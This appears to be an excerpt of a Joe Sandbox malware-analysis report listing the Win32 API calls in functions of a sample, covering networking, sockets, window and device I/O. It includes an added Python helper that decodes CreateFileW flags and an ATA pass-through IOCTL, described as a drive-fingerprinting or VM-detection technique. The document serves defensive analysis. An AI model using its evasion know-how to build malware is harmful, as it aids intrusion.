                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0027F3C3,?,?,?), ref: 0026F077
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2864067406-0
                                                                                                                • Opcode ID: 681568fecafa662230dedce7e7200ee1a2a8283cb0e4f6e0894b20cbec0a5ac2
                                                                                                                • Instruction ID: d49655eff932c487798bf442342ae5cb9306c74978b342273a3722571309a05e
                                                                                                                • Opcode Fuzzy Hash: 681568fecafa662230dedce7e7200ee1a2a8283cb0e4f6e0894b20cbec0a5ac2
                                                                                                                • Instruction Fuzzy Hash: F221F335510028EFDF258F54E899EEA7BB5FF4A710F144069F905872A2C3319DA1DB90
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002549B7
                                                                                                                  • Part of subcall function 00254A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00254A60
                                                                                                                  • Part of subcall function 00254A41: InternetCloseHandle.WININET(00000000), ref: 00254AFD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1463438336-0
                                                                                                                • Opcode ID: 9a0a4a7807197475a8e51487b206773f23a5bad4f91b77e7de000a200c5c5e97
                                                                                                                • Instruction ID: 4ade8f14c3db71215ef3873d3676f131f8962f5735fc094e55809ba3cb9d82d9
                                                                                                                • Opcode Fuzzy Hash: 9a0a4a7807197475a8e51487b206773f23a5bad4f91b77e7de000a200c5c5e97
                                                                                                                • Instruction Fuzzy Hash: D9210435260605BFDB11AF60DC15FBBF7A9FF48706F10400AFE0186250EB71D868AB98
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 002688A3
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002688BD
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002688CB
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002688D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                • String ID:
                                                                                                                • API String ID: 2169480361-0
                                                                                                                • Opcode ID: 6be95156af034c5554041bf7ad9320574904e06a61f7b6add096efc950a3a8fe
                                                                                                                • Instruction ID: 2a685a7d203049b2f390000e915427e05356b1a5a3356e3b7731af87ef01a83d
                                                                                                                • Opcode Fuzzy Hash: 6be95156af034c5554041bf7ad9320574904e06a61f7b6add096efc950a3a8fe
                                                                                                                • Instruction Fuzzy Hash: A1119635355114AFDB14AB24DC05FAA77A9EF45320F144215F516C72D2CB74AC64CB90
                                                                                                                APIs
                                                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 0025906D
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 0025907F
                                                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 0025908C
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 002590A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastacceptselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 385091864-0
                                                                                                                • Opcode ID: f88270d5dc4b6cfb8983ef063caeb42ad1851774cb2327b350c7b245b1cd86db
                                                                                                                • Instruction ID: b36fe1cc60d6c904220800becff290dc03b1cc0025c72c593104e28c234993ec
                                                                                                                • Opcode Fuzzy Hash: f88270d5dc4b6cfb8983ef063caeb42ad1851774cb2327b350c7b245b1cd86db
                                                                                                                • Instruction Fuzzy Hash: 9B21A176A00124AFDB10DF69DC84A9ABBFCEF49710F00816AF809D7290DA749A85CF90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00242CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002418FD,?,?,?,002426BC,00000000,000000EF,00000119,?,?), ref: 00242CB9
                                                                                                                  • Part of subcall function 00242CAA: lstrcpyW.KERNEL32(00000000,?,?,002418FD,?,?,?,002426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00242CDF
                                                                                                                  • Part of subcall function 00242CAA: lstrcmpiW.KERNEL32(00000000,?,002418FD,?,?,?,002426BC,00000000,000000EF,00000119,?,?), ref: 00242D10
                                                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00241916
                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,002426BC,00000000,000000EF,00000119,?,?,00000000), ref: 0024193C
                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,002426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00241970
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                • String ID: cdecl
                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                • Opcode ID: 83601784681b4eeec72c4de3be89c0358ff6d654ab75e2a80ac448b9fd539618
                                                                                                                • Instruction ID: fc75fd0964e679bc37742f2aa4b36ebd9fe3d3896f9e5a052b5571995547a9f8
                                                                                                                • Opcode Fuzzy Hash: 83601784681b4eeec72c4de3be89c0358ff6d654ab75e2a80ac448b9fd539618
                                                                                                                • Instruction Fuzzy Hash: BF11D63A120301AFCB19AF74D859D7A77B4FF45350B40802AF806CB294EB71987587A0
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00233D65
                                                                                                                  • Part of subcall function 002245EC: __FF_MSGBANNER.LIBCMT ref: 00224603
                                                                                                                  • Part of subcall function 002245EC: __NMSG_WRITE.LIBCMT ref: 0022460A
                                                                                                                  • Part of subcall function 002245EC: RtlAllocateHeap.NTDLL(00BB0000,00000000,00000001,?,?,?,?,00220127,?,0020125D,00000058,?,?), ref: 0022462F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 614378929-0
                                                                                                                • Opcode ID: 26d502dab011ae09bce53ca4ea2de5228dcfe846901bb6b6ffbc9752c340f1d0
                                                                                                                • Instruction ID: cee2d9eebe4c2d06501cc73f7835fbe85c0b3caef43bd6167ad6203a0ceed926
                                                                                                                • Opcode Fuzzy Hash: 26d502dab011ae09bce53ca4ea2de5228dcfe846901bb6b6ffbc9752c340f1d0
                                                                                                                • Instruction Fuzzy Hash: 3311E37292222ABBDB317FB0BC487AA3B98BF00360F504525F9498A191DF74CB74CE51
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00201E87
                                                                                                                  • Part of subcall function 002038E4: _memset.LIBCMT ref: 00203965
                                                                                                                  • Part of subcall function 002038E4: _wcscpy.LIBCMT ref: 002039B5
                                                                                                                  • Part of subcall function 002038E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 002039C6
                                                                                                                • KillTimer.USER32(?,00000001), ref: 00201EDC
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00201EEB
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00274526
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378193009-0
                                                                                                                • Opcode ID: ea002ca90961a4971a5e68d96d833d32ced3ac44a3e1883bf03a7f43411613d1
                                                                                                                • Instruction ID: 2514000b1b8b990aa84464b20783fca694c7ac0579eaf7dbacdb945cdef7e932
                                                                                                                • Opcode Fuzzy Hash: ea002ca90961a4971a5e68d96d833d32ced3ac44a3e1883bf03a7f43411613d1
                                                                                                                • Instruction Fuzzy Hash: 6921F9B1514794AFE7329B24D859FEBBBEC9B11308F04408DE69E57182C3745A98CB51
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0024715C
                                                                                                                • _memset.LIBCMT ref: 0024717D
                                                                                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002471CF
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 002471D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1157408455-0
                                                                                                                • Opcode ID: dd5c65700798bc77d11c620b99c4d3f25ab602945a1d217002966668f82e2850
                                                                                                                • Instruction ID: f5dc3b9efca4d7e18a53f1ecd119fd2d6483f2cc3bdf891fc38d9b128f1e8d3b
                                                                                                                • Opcode Fuzzy Hash: dd5c65700798bc77d11c620b99c4d3f25ab602945a1d217002966668f82e2850
                                                                                                                • Instruction Fuzzy Hash: BD110A759012287AE7206BA5AC4DFEBBB7CEF45760F10459AF508E71D0D3704E848BA4
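                                                                                                                The raw arguments in the CreateFileW and DeviceIoControl calls of this entry are easier to read once decoded against the Windows SDK constants: 0xC0000000 is GENERIC_READ|GENERIC_WRITE, the 3 / 3 / 0x80 that follow are FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING and FILE_ATTRIBUTE_NORMAL, and the control code 0x0004D02C splits under the CTL_CODE layout into device type FILE_DEVICE_CONTROLLER (IOCTL_SCSI_BASE), function 0x40B, METHOD_BUFFERED, read+write access, which is IOCTL_ATA_PASS_THROUGH. A read/write open of a device handle followed by that IOCTL with 0x200-byte (512-byte) in/out buffers is the usual shape of an ATA IDENTIFY DEVICE request, a technique malware commonly uses to read the physical drive serial for victim fingerprinting or VM detection; the listing shows only the call and not the ATA command placed in the buffer, so that reading is an inference to confirm in the decompiled function. The helper below is an added example and is not part of the Joe Sandbox report or of the sample: its constant tables are a hand-picked subset of the SDK headers, and `triage_page_entry` is a hypothetical wrapper that just feeds in the argument values shown in the entry above.

```python
# Added example (not from the Joe Sandbox report): decode the raw Win32
# constants that appear in a CreateFileW / DeviceIoControl call pair.
# Constant values are a hand-picked subset of the Windows SDK headers.

# --- CTL_CODE layout (winioctl.h): type<<16 | access<<14 | function<<2 | method
FILE_DEVICE_NAMES = {
    0x04: "FILE_DEVICE_CONTROLLER",    # IOCTL_SCSI_BASE: SCSI/ATA pass-through codes
    0x07: "FILE_DEVICE_DISK",          # IOCTL_DISK_BASE
    0x2D: "FILE_DEVICE_MASS_STORAGE",  # IOCTL_STORAGE_BASE
}
METHOD_NAMES = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS_NAMES = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
                "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]


def ctl_code(device_type, function, method, access):
    """Port of the CTL_CODE macro, so the lookup table below cannot drift from it."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# IOCTLs frequently seen in drive-fingerprinting code, built from their SDK definitions.
KNOWN_IOCTLS = {
    ctl_code(0x04, 0x0401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(0x04, 0x0402, 0, 3): "IOCTL_SCSI_MINIPORT",
    ctl_code(0x04, 0x040B, 0, 3): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(0x04, 0x040C, 0, 3): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(0x07, 0x0000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    ctl_code(0x07, 0x0022, 0, 3): "SMART_RCV_DRIVE_DATA",
    ctl_code(0x2D, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
}


def decode_ctl_code(code):
    """Split a DeviceIoControl control code into its CTL_CODE fields and name it if known."""
    device_type = (code >> 16) & 0xFFFF
    return {
        "device_type": FILE_DEVICE_NAMES.get(device_type, "0x%04X" % device_type),
        "function": (code >> 2) & 0xFFF,
        "method": METHOD_NAMES[code & 0x3],
        "access": ACCESS_NAMES[(code >> 14) & 0x3],
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }


# --- CreateFileW argument flags (winnt.h / fileapi.h)
GENERIC_FLAGS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                 (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE_FLAGS = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
CREATION_NAMES = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                  4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTR_FLAGS = [(0x80, "FILE_ATTRIBUTE_NORMAL"), (0x02, "FILE_ATTRIBUTE_HIDDEN"),
              (0x40000000, "FILE_FLAG_OVERLAPPED"), (0x20000000, "FILE_FLAG_NO_BUFFERING")]


def flag_names(value, table):
    """Name every set bit found in `table`; leftover bits are kept in hex so nothing is hidden."""
    names = [name for bit, name in table if value & bit]
    leftover = value & ~sum(bit for bit, _ in table)
    if leftover:
        names.append("0x%X" % leftover)
    return "|".join(names) if names else "0"


def decode_create_file(desired_access, share_mode, creation, flags):
    """Name the four numeric CreateFileW arguments a sandbox trace prints as raw hex."""
    return {
        "desired_access": flag_names(desired_access, GENERIC_FLAGS),
        "share_mode": flag_names(share_mode, SHARE_FLAGS),
        "creation": CREATION_NAMES.get(creation, "0x%X" % creation),
        "flags": flag_names(flags, ATTR_FLAGS),
    }


def triage_page_entry():
    """Hypothetical wrapper: the argument values are those printed in the listing above."""
    opened = decode_create_file(0xC0000000, 0x3, 0x3, 0x80)
    ioctl = decode_ctl_code(0x0004D02C)
    # Both in/out buffers in the trace are 0x200 bytes; record the size, do not guess its layout.
    ioctl["buffer_bytes"] = 0x200
    return opened, ioctl


if __name__ == "__main__":
    for part in triage_page_entry():
        print(part)
```

                                                                                                                The decoder reports unknown IOCTLs and unrecognised flag bits in hex rather than dropping them, so a code that does not match the small table still yields its device type, function number and transfer method, which is usually enough to look it up in winioctl.h or ntddscsi.h.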
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002413EE
                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00241409
                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0024141F
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00241474
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                • String ID:
                                                                                                                • API String ID: 3137044355-0
                                                                                                                • Opcode ID: f108aefe217675ef6955b978f421dad29ae9794b1847eac9362f6f2421ac2dcf
                                                                                                                • Instruction ID: 9201f8458614e9a10a7f20dc27187abfb535e9bba0d29d882a5693df2e0cce80
                                                                                                                • Opcode Fuzzy Hash: f108aefe217675ef6955b978f421dad29ae9794b1847eac9362f6f2421ac2dcf
                                                                                                                • Instruction Fuzzy Hash: F221D379A10309EFDB24DF90DC88ADABBBCEF00700F00846DA51697050D7B4EAA8DF50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0024AEA5,?,?,00000000,00000008), ref: 0021F282
                                                                                                                  • Part of subcall function 0021F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0024AEA5,?,?,00000000,00000008), ref: 0021F2A6
                                                                                                                • gethostbyname.WSOCK32(?,?,?), ref: 002592F0
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 002592FB
                                                                                                                • _memmove.LIBCMT ref: 00259328
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00259333
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                • String ID:
                                                                                                                • API String ID: 1504782959-0
                                                                                                                • Opcode ID: 289a080370f5735370cd1312fcbefe069c18fb22394e57814f926a1278b08214
                                                                                                                • Instruction ID: 9bed6a468b9a25be1e40e4574ca4f530132ace2b760a0e581c1e2d68bee673d9
                                                                                                                • Opcode Fuzzy Hash: 289a080370f5735370cd1312fcbefe069c18fb22394e57814f926a1278b08214
                                                                                                                • Instruction Fuzzy Hash: F5115E75910209AFCB04FBA0DD56CEEB7B9AF143117144065F506A71A2DB30AE28DF61
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0023C285
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0023C297
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0023C2AD
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0023C2C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 8cc914cd3780df8fbde786ce03a14756e41f42e78b3c856c2f09ac75f14b5fc9
                                                                                                                • Instruction ID: 46faeeda1d3a34ddc90bc7ecdc5de88e14b7e0072f5f1ad52bc11bc3e5c1c5d1
                                                                                                                • Opcode Fuzzy Hash: 8cc914cd3780df8fbde786ce03a14756e41f42e78b3c856c2f09ac75f14b5fc9
                                                                                                                • Instruction Fuzzy Hash: A0112EBA940218FFDB11DFE4CC85E9EBBB4FB08710F204092EA04B7294D671AE10DB94
APIs
• GetCurrentThreadId.KERNEL32 ref: 00247C6C
• MessageBoxW.USER32(?,?,?,?), ref: 00247C9F
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00247CB5
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00247CBC
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0021C657
• GetStockObject.GDI32(00000011), ref: 0021C66B
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0021C675
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
APIs
• DefDlgProcW.USER32(?,00000020,?,?,?,?), ref: 0026FF85
  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
• GetClientRect.USER32(?,?), ref: 0026FF2F
• GetCursorPos.USER32(?), ref: 0026FF39
• ScreenToClient.USER32(?,?), ref: 0026FF44
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0024354D,?,002445D5,?,00008000), ref: 002449EE
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0024354D,?,002445D5,?,00008000), ref: 00244A13
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0024354D,?,002445D5,?,00008000), ref: 00244A1D
• Sleep.KERNEL32(?,?,?,?,?,?,?,0024354D,?,002445D5,?,00008000), ref: 00244A50
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
APIs
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
APIs
  • Part of subcall function 0022869D: __getptd_noexit.LIBCMT ref: 0022869E
• __lock.LIBCMT ref: 0022811F
• InterlockedDecrement.KERNEL32(?), ref: 0022813C
• _free.LIBCMT ref: 0022814F
• InterlockedIncrement.KERNEL32(00BD4018), ref: 00228167
Similarity
• API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
• String ID:
• API String ID: 2704283638-0
APIs
• GetWindowRect.USER32(?,?), ref: 0026DE07
